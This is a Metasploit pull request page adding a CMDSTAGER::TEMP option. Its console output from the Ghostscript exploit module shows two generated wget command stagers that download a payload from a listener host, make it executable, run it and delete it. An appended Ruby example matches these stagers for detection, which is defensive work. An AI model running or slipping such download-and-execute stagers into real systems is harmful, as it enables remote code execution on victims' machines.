Add CMDSTAGER::TEMP with WritableDir fallback #11467

Merged
merged 1 commit into from Feb 26, 2019

wvu-r7 commented Feb 23, 2019

msf5 exploit(multi/fileformat/ghostscript_failed_restore) > run

[*] Using URL: http://0.0.0.0:8081/zTQAQMOYjita40H
[*] Local IP: http://192.168.1.5:8081/zTQAQMOYjita40H
[*] Generated command stager: ["wget -qO /tmp/pMuePBpB http://192.168.1.5:8081/zTQAQMOYjita40H;chmod +x /tmp/pMuePBpB;/tmp/pMuePBpB;rm -f /tmp/pMuePBpB"]
[+] msf.ps stored at /Users/wvu/.msf4/local/msf.ps
[*] Server stopped.
msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set cmdstager::temp /var/tmp
cmdstager::temp => /var/tmp
msf5 exploit(multi/fileformat/ghostscript_failed_restore) > run

[*] Using URL: http://0.0.0.0:8081/OUIC7m8jC
[*] Local IP: http://192.168.1.5:8081/OUIC7m8jC
[*] Generated command stager: ["wget -qO /var/tmp/DsPPLuNZ http://192.168.1.5:8081/OUIC7m8jC;chmod +x /var/tmp/DsPPLuNZ;/var/tmp/DsPPLuNZ;rm -f /var/tmp/DsPPLuNZ"]
[+] msf.ps stored at /Users/wvu/.msf4/local/msf.ps
[*] Server stopped.
msf5 exploit(multi/fileformat/ghostscript_failed_restore) >

Maybe resolves #11453. Minimally tested.

wvu-r7 requested a review from bcoles Feb 23, 2019

bcoles left a comment

Looks reasonable. Untested.

busterb self-requested a review Feb 26, 2019

wvu-r7 merged commit 659621a into rapid7:master Feb 26, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

wvu-r7 added a commit that referenced this pull request Feb 26, 2019

msjenkins-r7 added a commit that referenced this pull request Feb 26, 2019

wvu-r7 commented Feb 26, 2019

Release Notes

This adds the CMDSTAGER::TEMP option to the CmdStager library, allowing users to set a writable directory at runtime for command stagers to drop into. If the option is not set, and the module has the WritableDir option set, then the CmdStager library will fall back on that option.

wvu-r7 self-assigned this Feb 26, 2019

wvu-r7 deleted the wvu-r7:feature/cmdstager branch Feb 26, 2019
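
For defenders, the two runs in the pull request description show that the drop directory in the generated stager is set by the operator, so a rule keyed on /tmp misses the /var/tmp run. The following is an added example, not part of the pull request or of Metasploit's code, that matches the command's structure instead. The first two sample lines are the stager strings from the output above, the third is a constructed benign line, and the function names are hypothetical.

```ruby
# Added example: structural detection for the wget command stager shown above.
# Function names are hypothetical; this is not Metasploit code.

# Naive rule: only looks for a download into /tmp.
def naive_tmp_only?(cmdline)
  cmdline.match?(%r{wget -qO /tmp/})
end

# Structural rule: the same absolute path must be downloaded to, made
# executable, executed and deleted, whatever directory it lives in.
STAGER_RE = %r{
  wget\s+-qO\s+(?<path>/\S+)\s+(?<url>https?://[^\s;]+)\s*;\s*
  chmod\s+\+x\s+\k<path>\s*;\s*
  \k<path>\s*;\s*
  rm\s+-f\s+\k<path>(?=[\s;"']|\z)
}x

# Returns {dir:, path:, url:} on a match, nil otherwise.
def detect_stager(cmdline)
  m = STAGER_RE.match(cmdline)
  return nil unless m
  { dir: File.dirname(m[:path]), path: m[:path], url: m[:url] }
end

SAMPLES = [
  # From the first run in the output above (default directory).
  'wget -qO /tmp/pMuePBpB http://192.168.1.5:8081/zTQAQMOYjita40H;' \
  'chmod +x /tmp/pMuePBpB;/tmp/pMuePBpB;rm -f /tmp/pMuePBpB',
  # From the second run (cmdstager::temp set to /var/tmp).
  'wget -qO /var/tmp/DsPPLuNZ http://192.168.1.5:8081/OUIC7m8jC;' \
  'chmod +x /var/tmp/DsPPLuNZ;/var/tmp/DsPPLuNZ;rm -f /var/tmp/DsPPLuNZ',
  # Constructed benign line: downloads to /tmp but touches unrelated files.
  'wget -qO /tmp/report.csv http://intranet.example/report.csv;' \
  'chmod +x /tmp/job.sh;/tmp/job.sh;rm -f /tmp/old.log'
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each do |line|
    hit = detect_stager(line)
    puts "naive=#{naive_tmp_only?(line)} structural=#{hit ? hit[:dir] : 'no match'}"
  end
end
```

The naive rule misses the /var/tmp stager and flags the benign line, while the structural rule reports both stagers with their directories and ignores the benign line.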
